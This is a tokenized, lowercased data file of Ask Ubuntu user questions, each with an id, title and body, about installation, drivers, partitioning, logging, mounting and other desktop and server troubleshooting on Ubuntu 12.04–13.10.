) output of lspci 00:00.0 host bridge : intel corporation xeon e3-1200 v2/3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.4 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 5 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev a4 ) 00:1f.0 isa bridge : intel corporation b75 express chipset lpc controller ( rev 04 ) 00:1f.2 ide interface : intel corporation 7 series/c210 series chipset family 4-port sata controller [ ide mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 00:1f.5 ide interface : intel corporation 7 series/c210 series chipset family 2-port sata controller [ ide mode ] ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] cape verde pro [ radeon hd 7750 ] 01:00.1 audio device : advanced micro devices , inc. [ amd/ati ] cape verde/pitcairn hdmi audio [ radeon hd 7700/7800 series ] 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 )
384757	ca n't shutdown after installing 13.10	after installing ubuntu 13.10 saucy , i ca n't shutdown . i have to lock the system and then shutdown from there . please help !
384758	name of detect keyboard layout tool	what 's the name of the program used to detect keyboards layout during ubuntu installation ? is there another tool i can run after installation in other to discover the correct layout for a keyboard i bought ?
384759	how to disable compiz in ubuntu 13.04	so i was learning python , blah blah blah i switched over to windows so i could play minecraft ( i forgot how to enable the .jar to executable ) and then i switched back and no my computer is so laggy , and according to system monitor its compiz . no idea what it is or anything , i just need to disable it , or uninstall it because it is not doing anything at all . it was not this laggy before and its very undesirable .
384761	how do i remove ubuntu from mac os x ?	i need to uninstall ubuntu from mac os x to allow mac os more space and i do n't need ubuntu any more . report for internal hard disk : current gpt partition table : # start lba end lba type 1 40 409639 efi system ( fat ) 2 409640 157707319 mac os x hfs+ 3 157707320 158976855 mac os x boot 4 158978048 166789119 linux swap current mbr partition table : # a start lba end lba type 1 1 236978175 ee efi protective mbr contents : boot code : unknown , but bootable partition at lba 40 : boot code : none ( non-system disk message ) file system : fat32 listed in gpt as partition 1 , type efi system ( fat ) partition at lba 409640 : boot code : none file system : hfs extended ( hfs+ ) listed in gpt as partition 2 , type mac os x hfs+ partition at lba 157707320 : boot code : none file system : hfs extended ( hfs+ ) listed in gpt as partition 3 , type mac os x boot partition at lba 158978048 : boot code : none file system : unknown listed in gpt as partition 4 , type linux swap could you please suggest to me how to uninstall it ?
384763	trying to install ubuntu server 12.04.3 from cd	hi im trying to install ubuntu server 12.04.3 32-bit from a cd i have burned with the iso file all seems to look good but when booting it seems to skip it as if its not recognised ive sucsessfully installed ubuntu 9.10 desktop as i had a disc i bought from ubuntu years ago . so my boot order is ok everything else seems to be ok just cant figure out what im doing wrong ?
384769	is it possible to install gnu c library version 2.17 in ubuntu 12.04 ? how ?	i want to run ppsspp emulator in my ubuntu 12.04 64 bits system . it requires glibc version 2.17 : ./ppssppsdl : /lib/x86_64-linux-gnu/libc.so.6 : version `glibc_2.17 ' not found ( required by ./ppssppsdl ) it seems the official repository version is 2.15 what can i do ?
384776	how do install clamav-0.98tar.gz	how do i install : clamav-0.98tar.gz i have downloaded the file already . but i dont know how to install it so that this latest version of clamtk works for my ubuntu 12.04 i 'm supposed to use the archive manager but i dont know how to use that ... or can i do this directly from the terminal somehow ? the software centre 's version is not this version in spite of what it says so i had to download this file myself i just do n't know how to install it thanks !
384777	partitioning for ubuntu install	i shrunk my windows 8 partition to create a partition for dual boot of ubuntu . on the live usb i opened up gparted to format that unallocated space into ext 4 . the problem is i have four primary partitions already and can not make another primary partition . the four partitions are labeled sda1 system , sda2 with no label , sda3 recovery , and sda4 hp_tools . i am new to this area , but would love to try ubuntu and this has thrown me a curveball . i am not quite sure what to do from here .
384778	printing canceled `` bond types inquiry lab '' on mg2200-series , whenever i try to print	i have a canon mg2220 printer and am having trouble printing . when i try printing i get the message from gnome 3 , `` printing canceled `` bond types inquiry lab '' on mg2200-series '' . i have completely setup the printer and installed the drivers according to this web page ( and several others ) `` http : //www.doopensource.com/hardware/making-a-canon-pixma-mg2220-print-from-linux/ '' . i installed using the install.sh file and , after it still did n't work , using the two amd64 .deb files in the packages folder as stated on this webpage `` how to install a deb.tar.gz file ? `` , this did not work either . the printer is configured just fine in libreoffice writer and in the printer settings , but when i go to print a file , a little window pops up too quickly to read then i get the aforementioned message from gnome . maybe i am just slow and unable to find anything , but i ca n't find anything on this issue . when i google it or search it up on a forum or question site , it just brings up how to cancel printing . i am extremely frustrated and now hope that setting up a windows 7 virtual machine will work , but i do not want to have to do this every time i print , as i will have start up the machine and to create a virtually shared folder and blah blah . i was also able to get a really unclear screenshot of the window that pops up , in which some text is readable . i just am not quite sure how to post screens if someone could help me with that . thanks .
384781	lenovo g580 with trackpad issues on ubuntu 13.10 64 bit	my laptop is a lenovo g580 and i recently upgraded to 13.10 . when i wake it up from sleep the track-pad stops working and a little banner in the conner of the screen has a picture of a track-pad with an x over it . please help , i really do n't want to have to re-install from scratch !
384783	restore windows 8.1 mbr from ubuntu	i had windows 8.1 and i was booting using uefi . i installed ubuntu 13.10 in legacy bios and than i was trying to convert it in efi using this : https : //help.ubuntu.com/community/uefi converting ubuntu into efi mode start boot-repair , click on `` advanced options '' , go to the `` grub location '' tab . if you do not see a `` separate /boot/efi partition '' line , this means that your pc does not have any efi partition . in this case , exit boot-repair , then create an efi partition ( see the `` creating an efi partition '' paragraph above ) . if you see a `` separate /boot/efi partition '' line , tick it then click the `` apply '' button . set up your bios so that it boots the hdd in efi mode ( see the `` '' set up the bios in efi or legacy mode '' paragraph above ) . now i want to restore windows 8.1 booting in uefi again but when i switch to uefi in bios i get `` no operatoring system '' i also have a recovery partition if that helps . can anyone help me restore windows mbr again booting in uefi ?
384785	what does the 'defaults ' mount option mean for ntfs drives/partitions ?	for ext4 drives the defaults option in /etc/fstab translates to : rw , suid , dev , exec , auto , nouser , async i want to know what the defaults option transaltes into for ntfs drives . it is not covered in the ntfs-3g manual and not in the ubuntu community documentation .
384786	terminal update package	i recently installed spotify which installed fine . however , i am now trying to intall a theme . when downloading the package in terminal ( sudo add-apt-repository ppa : tiheum/equinox ) that downloads fine but when i use the command ( sudo apt-get update & & sudo apt-get install faenza-icon-theme ) to update the package it continually tries to update the spotify package which i had previously installed and no mention of theme file . do i need to clear the terminal somehow before i can install a new package ? thanks
384787	is there any license required to from ubuntu for applications when i download apt-get ?	i 'm planning to install ubuntu 12.04 and setup sendmail mail server , bind dns and squid proxy server . will there be any license required from ubuntu when i download it using apt-get ?
384793	ubuntu software update problem	w : failed to fetch http : //au.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/i18n/index , e : some index files failed to download . they have been ignored , or old ones used instead .
384794	ubuntu 13.10 main menu now displaying correctly	i have a three issues going on right now and i 'm sure they are all related . my main menu at the desktop appears like normal . but i try to get to the sub-menus and everything is a ) discolored b ) some submenu items do not show up like they used to . mainly in the wi-fi menu bar , that i 've noticed anyway my cursor is gone . that happens occasionally though . i 'm not too worried about it . usually goes away with a reboot . at the login screen , usually my wallpaper is displayed . now it is only a white screen with the password bar . this has been happening ever since the first problem started . if i can figure out how to post a screenshot of my menu without my cursor , i will do it . thank you to anyone who can help me fix at least the first problem . the other two are not quite so important to me . thank you in advance to anyone who can help : )
384795	programs launched from docky are in different language	my system 's language is turkish , so when i launch a program using a terminal or unity , the launched programs are -as one would expect- in turkish . however if i launch the same program from docky , everything 's in english . i believe it was caused by me as i launch docky using env lc_all=c docky , which causes it to run in default language , english . unfortunately , i had to use that command , otherwise docky would n't launch at all due to some silly error caused by turkish characters . my question is , is there any way to make docky run in english but make the programs it launches run in my system 's language ? edit : the error that forced me to use env lc_all=c docky : [ systemservice ] could not initialize power manager dbus : 'org.freedesktop.dbus.error.matchruleinvalid : unknown key `` 覺nterface '' in match rule' please note : it 's 覺nterface , not interface . first one is coded in utf-8 and the other is in ascii . thanks in advance !
384797	mousepad is jittery and inaccurate	i am using ubuntu 13.10 at the moment . i know this will probably make some people think this has been asked before ( i 've read similar issues , but nothing i 've tried has helped ) . so on windows the mousepad seem to track my finger movements perfectly . if i move very slowly down and to the right , it will follow me very slowly : down and to the right . however on ubuntu , if i move slowly down and to the right , it seems to randomly jump pixels . rather than tracking perfectly , every once in a while ( quite frequently ) it appears to jump like 8 pixels ( a small but noticeable amount ) . this means when i drag slowly down and to the right , it will periodically jump further than it should . the problem is , this jitter is extremely noticeable when i try to use left click ( my mousepad has soft button areas ) . so when i want to click a link , my thumb touches the mousepad to begin the click , and the mouse jitters , and causes me to click-and-drag a lot , or just completely miss what i was trying to click . i 've tinkered with all of the settings i could find and nothing seems to make any impact whatsoever on this . settings i 've tried : synclient -- -- fingerlow fingerhigh minspeed maxspeed accelfactor horizhysteresis verthysteresis areabottomedge xinput on synps/2 synaptics touchpad -- -- two-finger pressure soft button areas noise cancellation the only setting that made any impact at all was areabottomedge , but the problem was that it did n't actually do what i wanted to . so it stops tracking movements on the bottom part of my laptop ( ie essentially disabling tracking on the 'soft-button area ' depending what i set the value to ) . however when two fingers are on the trackpad , it still tracks my thumb in that area which causes it to jitter when i try to click . any and all help is appreciated . this is driving me crazy .
384798	how to check which version of kvm i am running ?	i have installed kvm using the instructions given on the wiki . however , when i try to check its version using kvm -- version what i get as output is this qemu emulator version 1.2.0 ( qemu-kvm-1.2.0+noroms-0ubuntu2.12.10.5 , debian ) , copyright ( c ) 2003-2008 fabrice bellard which i believe is qemu 's version , not kvm 's . i have tried the method given here , but this does give an output . i wanted to know what is the correct method to get the version of kvm i am running . specifications : ubuntu 12.10 linux 3.5.0-43-generic
384806	sudo ( not i ) remember my password	trying to upgrade my ubuntu . i have n't used it in a while and want to upgrade it to 13.10 i understand i have to go from 12.04 to 12.10 to 13.04 to 13.10 . but when i am in the terminal and enter sudo do-release-upgrade and the terminal asks me for my password . when i enter it in , it informs me `` sorry , try again '' . i already went in recovery and reset my password thinking i forgot it but it still will not take the new password . what can i do ? p.s . i 'm a beginner at linux . sorry if i did not include any information that will help you guys help me . thanks in advance .
384807	nginx on ubuntu 12.04 lts server showing wrong 'remote_addr '	i have an ubuntu production server running on nginx 1.1.19 . i also have a php web application running on it which relies on the remote_addr to select the network printer nearest to it . however , the printing part is not working because the remote_addr variable is not showing the correct ip address . for example , my current ip address is xx.xx.103.181 however nginx is returning xx.xx.99.10 . i have been using apache before and it was working properly . any suggestions on how to fix this ?
384809	i just installed ubuntu server 12.04 , now i ca n't browse the internet	i just installed ubuntu server 12.04 , now i ca n't browse the internet . when i go to firefox , it say `` server not found '' . i try different websites , i go the same thing . i have my ethernet cable plug in right , when i plug the ethernet cable to a windows computer the internet works fine .
384812	for ubuntu my hard drive is a thumbstick i still have my hard drive but it doesnt show it in file system what can i do	i have my hard drive and i can see it if you go to disks , but when i go to file system i cant find it , that means i cant send files to it and i cant use it . any fix for this problem if there is i really need it and also i formated it to the one to use in linux type 4 something i forgot . when i see it i cant use it because it says that it has 0 bytes and it shows it as a gray rectangle cube and its also called sdb .
384814	how do i update the repository in xfce4 ?	i 've installed xfce4 on my chromebook using crouton , but now i 'm having trouble with repositories . what should i do to get the latest repositories to install things like wine and skype ? what about a software center , such as the one in ubuntu . am i able to get that here too ? i 'm looking to be able to apt-get zsnes , but my repository wo n't find it . i 'm also wondering how to uninstall packages . xfce4 came with audio mixer , but the purge command wo n't work ( sudo apt-get purge audio mixer ) other info : here 's what i have in my source list file : i get these errors at the end of the sudo apt-get update :
384816	formatting drive does n't do anything and shows no errors	i apologize for any noobness , i 'm fairly new to linux and i 've tried searching and troubleshooting on my own but i 've come up empty handed . i 'm attempting to format a usb drive but running into issues with permissions ( i think ) i 've tried right clicking the drive in the folder list and choosing `` format '' and after running through the options and doing the final confirmation the dialogs close with no errors , but nothing changes . i 've attempted changing the permissions for the drive in using the gui ( even though it shows the owner as `` me '' and that i have full access or read and write ) and allowing anyone to read/write/ modify - but after submitting the changes the options just revert back without any notification ( not sure why ubuntu even has these gui options since they do n't do much out of the box ) after searching online i 've found a few things that are supposed to help `` own '' a folder but nothings worked that i 've found so far i 've tried doing the following in the terminal : sudo chown -r /media/ ( username ) / ( drivename ) -- but get a `` missing parameter '' error any help would be appreciated or suggestions of where else to look
384822	how can i fix not being able to click on anything ?	i booted up my computer today , and after logging in , i can move the cursor , but i ca n't click on anything . i 've tried the laptop 's internal touchpad and two external mice . none of them work . if it matters , i 'm running ubuntu 12.10 how can i fix this ?
384825	headset mic not being used	i have an asus 1015e laptop that has a single 3.5mm audio combo port for both mic and headphone ( trrs connector plugs go in there ) . so i use headsets that come in a single wire which has both headphone and mic functionality . ( like the ones that come with smartphones ) . this headset works perfect on windows where the integrated mic of the laptop is disabled in lieu of the headset 's mic whenever it is connected . however , that 's not the case on my ubuntu 13.10 ( x86_64 ) . how can i fix this ?
384826	is putting swap on a usb2 flashdrive practical ?	after searching here , i found no direct answer to : is it practical to put swap on a usb flash drive ? i do not yet know if the teeny-tiny flash drive ( fit cz33 ) i wish to use runs at high-speed ( 480 mbps ) , full-speed ( 12 mbps ) , or low-speed ( 1.5 mbps ) , but am checking w/ sandisk . why ? because i just changed my thinkpad r60 9459at8 over to a samsung ssd after maxing out the ram at 3gb , set up trim after repartitioning with 20 % free , removed swap , set swappiness to 0 and otherwise tuned up xubuntu 13.10 for ssd . however , since it 's not practical for me to add a mechanical hdd , i 'd like to move the swap over to a flashdrive which will always stay in the left side usb2 socket , for i'dather wear out a $ 12 flashdrive instead of a $ 180 ssd . why ? sometimes , i lose my wifi connection until i reboot , plus rarely see slowdown , and i 'd like to see if having swap again would help . i do watch a system monitor always in a panel and never exceed 30 % free memory use , but would like to have swap without putting in on the ssd . yea , or nay ? and , does the size of the flashdrive make any difference : 8gb , 16gb or 32gb ?
384827	how do i start the privacy and activity manager from command line ?	this is the `` security & privacy '' dialogue in system settings .
384833	how to display page number in bangla language in libreoffice writer ?	i was trying to get the page numbers in bengali language in libreoffice . i 've tried by enabling ctl from tools > options > language settings > languages . then from tools > options > language settings > comples text layout > general options , i selected bengali ( bangladesh ) from the numerals . at this point , not only in the footer but also in the whole document , all numbers changed in to bengali . but my aim was to change the language to bengali of the page numbers in the footer only , not the whole document . to be frankly i did not find anything like this for libreoffice , as there is in ms word . so , how can i change only the page numbers into bengali language at the footer please ? update : i tried to modify the page number character style , by setting its ctl language to bengali . but it did not either .
384835	ubuntu does n't load after bios ?	i have been trying to do figure out the wakeonlan options in bios and i just changed one option and restarted my system couples of times and now when i start it after hp bios logo it gives me blank screen and stuck there forever , i guess bios lost the os path or something and it could n't find it . tried to install new ubuntu and it shows the option install ubuntu 13.10 alongside ubuntu 13.10 that means i still have the ubuntu on my system but i cant get to it , when i boot it from usb there is an option for disk check i tried this one too but did n't do any good . edit : tried making boot repair on bootable usb but when i hit recommended repair and it says no internet connection detected . please connect internet . then try again . i have proxy internet so i do n't know how to set its proxy for system , wondering why it has to connected to the internet.. ca n't it do the job without internet connection ? boot info summary says no boot loader is installed in the mbr of /dev/sda . syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdb . here is the gparted screen shot help !
384838	i changed to a desktop environment that i didnt install	i changed the desktop environment to gnome which i did n't install . now i just see my desktop but i ca n't see my task bar and application bar . what do i do to get bacteria to my normal desktop environment ?
384839	station ca n't access hosapd error	following /var/log/syslog dec 2 14:09:13 msis networkmanager [ 820 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning dec 2 14:09:13 msis kernel : [ 2607.278976 ] wlan0 : authenticate with 00:24 : d2:24:6d:7b dec 2 14:09:13 msis kernel : [ 2607.278994 ] wlan0 : allocated sta 00:24 : d2:24:6d:7b dec 2 14:09:13 msis networkmanager [ 820 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating dec 2 14:09:13 msis kernel : [ 2607.297517 ] wlan0 : inserted sta 00:24 : d2:24:6d:7b dec 2 14:09:13 msis kernel : [ 2607.297523 ] wlan0 : direct probe to 00:24 : d2:24:6d:7b ( try 1/3 ) dec 2 14:09:14 msis kernel : [ 2607.500330 ] wlan0 : direct probe to 00:24 : d2:24:6d:7b ( try 2/3 ) dec 2 14:09:14 msis kernel : [ 2607.704022 ] wlan0 : direct probe to 00:24 : d2:24:6d:7b ( try 3/3 ) dec 2 14:09:14 msis kernel : [ 2607.907739 ] wlan0 : authentication with 00:24 : d2:24:6d:7b timed out dec 2 14:09:14 msis kernel : [ 2607.907849 ] wlan0 : removed sta 00:24 : d2:24:6d:7b dec 2 14:09:14 msis kernel : [ 2607.914089 ] wlan0 : destroyed sta 00:24 : d2:24:6d:7b dec 2 14:09:18 msis kernel : [ 2612.291421 ] wlan0 : deauthenticating from 00:24 : d2:24:6d:7b by local choice ( reason=3 ) dec 2 14:09:18 msis networkmanager [ 820 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > disconnected i do n't know authuntication error . help me plz
384843	my 8gb sandisk shows 64 mb after installing ubuntu from it	my 8gb sandisk shows only 64 mb now after installig ubuntu from it.i made start up disk of ubuntu and gave it to my friend.but when i got back my usb it shows 64mb and does n't work on any operating sysytems
384845	problem installing 32 bit cadence ic610 in 64 bit os	i am trying to install 32 bit cadence ic610 in 64 bit ubuntu . installscape gui is not popping up and it says java is not found . initializing installscape using jvm at /cadence/installscape/iscape/runtime/lnx86 /bin/java . this might take some time ... /cadence/installscape/iscape/bin/iscape.sh : 209 : exec : /cadence/installscape/iscape/runtime/lnx86/bin/java : not found it looks like the problem is due to installation of 32 bit cadence in 64 bit os . i am getting the same error as shown in this link problem on java : not found . please help me in solving it .
384846	how do you install a file in a tar archive ?	it seems like a lot of people do n't know this essential skill of linux -- so it 's time to learn : )
384849	extract tar file	i am not able to extract tar file command tar -xvfz node_archive.tar.gz khem error show error tar : z : ca n't open : no such file or directory tar : error is not recoverable : exiting now
384853	no unity , desktop icons ( 13.10 )	after 3 reinstalls on my dell dimension 2400 , i can only see the desktop background and the cursor . nothing else appears . i have tried removing , redownloading and reinstalling ubuntu-desktop . i have also tried : sudo apt-get remove compiz sudo apt-get remove compix-core exit thanks in advance for the assistance .
384856	find .sql and .sql.gz files using find command	i have a shell script code which find .sql.gz files and moves them : find $ dir -type f -mtime $ time -name \*sql.gz | while read file do echo `` earlier $ file will be moved to different folder . '' > > $ path_log_file mv -f $ file $ path_folder done now i have few more files with the extension .sql so how can i modify my above code so it includes this file extension as well . thanks .
384858	could not load module rsyslog lmnsd_gtls.so	the rsyslog module is showing up in system log /var/log/syslog as message repeated . rsyslog was also showing 99 % cpu use in top at one point , possibly unrelated . tail /var/log/syslog dec 1 22:18:16 here rsyslogd-2066 : could not load module '/usr/lib/rsyslog/lmnsd_gtls.so ' , dlopen : /usr/lib/rsyslog/lmnsd_gtls.so : can not open shared object file : no such file or directory [ try http : //www.rsyslog.com/e/2066 ] dec 1 22:18:56 here rsyslogd-2066 : last message repeated 4 times lsb_release -a description : ubuntu 12.04.3 lts release : 12.04 sudo apt-cache showpkg rsyslog package : rsyslog versions : 5.8.6-1ubuntu8.5 related question : how do i find that lmnsd_gtls.so is related to rsyslog-gnutls ?
384860	how do i find a package that contains a given module ?	how do i find which package contains a given module ? i had a missing module in /usr/lib/ , and was trying to figure out which package would fix the problem using apt-get the error was in /var/log/syslog involving lmnsd_gtls.so and the solution was to install the package rsyslog-gnutls . see also could not load module rsyslog lmnsd_gtls.so
384862	in ubuntu 13.10 ... ..screen showing black , after login credentials ... please reply	i am getting black screen and a moving cursor just after login page ( after entering username and password ) .i had re-started several times but no use , please assist me . thanking you in advance . please reply
384863	undoing sublime installation	hi i followed the following tutorial http : //www.technoreply.com/how-to-install-sublime-text-2-on-ubuntu-12-04-unity/ and i think it messed up my computer , i undid the steps by removing the files that were edited in the link . eg replaced defult.lists with a backup deleted usr/share/applications/sublime.desktop -removed sublime folder in opt removed sublime symlink in usr/bin however when i right click a text file i see a broken symbolic link , does anyone know how to remove this ? i donât want to reformat ubantu again ... furthermore i installed sublime using apt , however it did not run i think its because the first tutorial has messed something up
384867	ubuntu 12.04 external monitor	i am trying to hook my samsung series 7 chronos to a projector , if i type the command 'disper -l ' , i can detect the hdmi display , but if i do 'fn + f4 ' , my monitor shuts off , the external monitor connects , and displays a black screen . any help ?
384869	sudo lshw -c network not showing any results	when i type the command sudo lshw -c network , it returns > pci ( sys ) and exits . i have problems with wireless network . the network icon does n't show any wireless connection , just the section wireless networks . it just show ethernet . i ca n't connect to any network because i have a wifi modem and no cable . i 'm a new user to ubuntu . my wireless adapter is broadcom bcm4312 and using i 'm using dell inspiron mini 1011 running ubuntu 13.10 .
384870	how can i disable gnome keyring ?	i have tried several methods to disable gnome keyring , but have had no success so far . i have removed gnome-keyring already using the following command : sudo aptitude remove gnome-keyring i have also tried this : rm /home/username/.local/share/keyrings/login.keyring but yet , whenever i try to use svn , i am asked for gnome keyring password : password for 'default ' gnome keyring : what else should i do ?
384876	after re-installing wubi/ubuntu and use old root.disk , i get thrown to grub shell	my wubi files were corrupted and i had to re-install ubuntu ( through wubi ) again . before i un-installed the old ubuntu i saved the old root.disk in external drive.after i installed i tried to boot ubuntu ( 12.04 lts ) , to make sure it works.everything works fine . but when i copy the old root.disk in ubuntu/disks folder and boot to ubuntu it takes me to grub shell/command line.after browsing online i came across this soulution set root= ( hd0,1 ) loopback ( loop0 ) /ubuntu/disks/root.disk set root= ( loop0 ) linux /boot/vmlinuz root=/dev/sda1 loop=/ubuntu/disks/root.disk ro initrd /initrd.img boot line number 4 does n't work , doesnt seem like there is file vmlinuz- ... can somebody please give me step by step commands to boot into ubuntu . my machine is window 7 .
384877	update out-of-date-in-apt python on ubuntu server 12.04	basically , i have a server running 12.04 lts , and for some reason apt only has python 2.7.3 , which is ~18 months out of date . unfortunately , there are some bugs in the older version of python ( specifically , i 'm using the zipfile library , which fails silently on certain archive compression formats ( tested against a different box with python 2.7.6 ) ) . basically , where can i get an updated python install ? i do n't see it in apt-cache , but i ca n't imagine the lts apt repositories are n't being updated .
384882	chromium-browser version 28 for ubuntu 12.04	recently chromium-browser package in ubuntu 12.04 was updated to version 30.0.1599.114 for my installation . before that update i had version 28.0.1500.52 installed on my system . together with this system i was running a vlc plugin in my chromium-browser and with the new version 30 this plugin crashes all the time . the best way to go is of course to make the plugin work with version 30 of chromium-browser but right now i do not have the time for that . the way forward for me right now is to revert the chromium-browser to version 28 again in order to get my system up and running again with my vlc plugin . i ca n't figure out where to find the package chromium-browser 28.0.1500.52-0ubuntu1.12.04.2 , can anyone help me ? what is the proper way to install an old version of chromium-browser ? thanks , /peter
384883	installing a linux operating sys on acer netbook with none working winxp using usb flash	good day . i 'm trying to install a linux operating sys on acer netbook with none working winxp using usb flash . but my acer netbook ca n't detect or read from usb . the winxp home edition is either corrupt or none functional and i 'd like to replace it with either of linux os . thank you in advance for your help .
384884	unable to mount windows partition - fast boot is already off - still get the problem	i have installed windows 8.1 and ubuntu on my new computer , and get the following error when i try to mount the device . i already googled and turned all the hibernation / fastboot options off , but i still have this problem . the option secure boot is disabled in the uefi-bios aswell . does anyone have an idea , what might cause the problem ? and is there a chance to overwrite the ubuntu error and mount the device -w to do some testing ? thank you , here 's the error-message : error mounting /dev/sda2 at /media/simon/9a3e3eef3e3ec453 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/simon/9a3e3eef3e3ec453 '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
384885	not smooth in watching online video	sometimes when i watch online video the sound can be smoothly played however the images get stuck . i 've installed nvidia driver but does n't solve this problem .
384886	problem with adobe installation	i searched for adobe flash player in app center then clicked on install button . the installation failed and i received this massage : flashplugin-installer : depends : libnspr4-0d but it can not be installed . i 'm new to ubuntu . please help me . many thanks to you .
384887	installing invenio	when i execute the command make to install invenio this error appears : make all-recursive make [ 1 ] : entering directory `/root/src/invenio' making all in po make [ 2 ] : entering directory `/root/src/invenio/po' make [ 2 ] : *** no rule to make target `makevars ' , needed by `makefile ' . stop . make [ 2 ] : leaving directory `/root/src/invenio/po' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/root/src/invenio' make : *** [ all ] error 2 i installed it following this guide . any help ?
384889	need to write `` wvdialconf `` to specific dialer section ratherthan [ defaults dialer ]	hello friends i am using different datacard ( like vodaphone , reliance , idea ) and connect using `` wvdial '' command . i have created 2 defferent dialer section one vodaphone and other is realince . first i would use `` wvdialconf '' to write basic info ( modem , baud , init , and init2 ) to wvdial.conf in defaults dialer section ( [ dialer defaults ] ) . but i need to write it into specific dialer section ( vadaphone or reliance ) . how can i write 'wvdialconf ' to specific dialer section . [ dialer reliance ] init1 = atz init2 = atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 modem type = analog modem isdn = 0 phone = # 777 modem = /dev/ttyusb0 username = '' password = '' baud = 9600 [ dialer vodaphone ] init1 = atz init2 = atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 modem type = analog modem isdn = 0 phone = *99 # modem = /dev/ttyusb0 username = '' password = '' baud = 9600
384891	rsyslog ruleset issue	explanation : i am trying to set up an rsyslog server to receive messages from multiple clients , but i am not seeing any message arrive from the client machines , i have tried many things and when looking through the debug logs of the rsyslog i noticed something odd . information : the relevant lines of the configuration are : $ template normalize_format , '' % timegenerated:12:19 : date-rfc3339 % % hostname % % msg % \n '' $ modload imtcp $ ruleset remote * . * |/proc/16301/fd/1 ; normalize_format $ inputtcpserverbindruleset remote $ inputtcpserverrun 34003 the relevant lines of the debug log : cfline : ' $ ruleset remote' dogetword : get newval 'remote ' ( len 6 ) , hdlr 0x40b170 begin new current rule set 'remote' cfline : '* . * |/proc/16301/fd/1 ; normalize_format' ... template : 'normalize_format ' assigned ... cfline : ' $ inputtcpserverbindruleset remote' dogetword : get newval 'remote ' ( len 6 ) , hdlr 0x7f8491e6ed40 imtcp current bind ruleset 0x1585580 : 'remote' cfline : ' $ inputtcpserverrun 34003' dogetword : get newval '34003 ' ( len 5 ) , hdlr 0x7f8491e6e740 ... all rulesets : ruleset 0x1582b20 : rsyslog ruleset rsyslog_defaultruleset : ruleset 0x1585580 : rsyslog ruleset remote : rule 0x15854f0 : rsyslog rule : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff builtin-pipe : pipe /proc/16301/fd/1 repeatedmsgreduction : 0 resume interval : 30 state : rdy exec only when previous is suspended : 0 submission mode : fast , but supports partial mark messages end of rulesets . i omitted some lines where ... is . i felt they were just fluff - if they are indeed important , i can put them back . focus : basically , as you can see above - the ruleset 'remote ' is being created , but then when i want to assign it , the debug log says that it is a new variable ( shown again below ) : cfline : ' $ ruleset remote' dogetword : get newval 'remote ' ( len 6 ) , hdlr 0x40b170 cfline : ' $ inputtcpserverbindruleset remote' dogetword : get newval 'remote ' ( len 6 ) , hdlr 0x7f8491e6ed40 i have a feeling this is the issue , if so - how can i fix this ? if not - please let me know how i should proceed .
384895	phpmyadmin configration	i am using ubuntu 13.04 version and i install lamp server , php and mysql . install phpmyadmin sudo apt-get install phpmyadmin i insert line in /etc/apache2/apache2.conf by using : sudo gedit /etc/apache2/apache2.conf insert line in `` # include the virtual host configurations : '' include /etc/phpmyadmin/apache.conf when i restart apache2 by using : sudo /etc/init.d/apache2 restart this give me error : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername namevirtualhost *:80 has no virtualhosts ... waiting apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername kindly help me to solve this problem ?
384896	mounting my timecapsule on ubuntu 12.04	i am newbie to mounting , but already used ubuntu on a user level . i have installed ubuntu with an xbmc and wanted to mount my timecapsule as well so i can manipulate the data on it . what i tried until now to mount it ( from google & internet ) using sudo mkdir /mnt/tc and sudo mount.cifs //192.168.0.13/data/ /mnt/tc -o user=htpc pass=xxxxxx i also tried to add sec=ntlm , that did n't work . i am getting an error ( 22 ) here and even going through the manpages , i was n't enlighted . strangely enough the access from xbmc workings fine on the smb share ... thanks for your help ,
384898	how to install gui on ubuntu server 12.04 lts from cd ?	i have installed ubuntu 12.04 server lts for 64- bit . i need to install graphical interface on it , but without connecting to the internet , using cd as a source . i found some hints on the forum , but as far i am very new , i would like to ask for very detailed instructions . how exactly to load gui on cd and then to lunch it installation from the console ? thanks to all in advance !
384899	touch support for asus tf701t	i would like to know ; if it is possible to deploy ubuntu touch on asus tf701t ?
384901	maximum screen brightness not enough on lenovo k49	though i adjust my screen brightness to maximum but it 's still not enough . i have to type in the following every time when i wan na change which is troublesome . sudo su -c `` echo 4000 > /sys/class/backlight/intel_backlight/brightness '' can anybody talk about how you deal with this problem ?
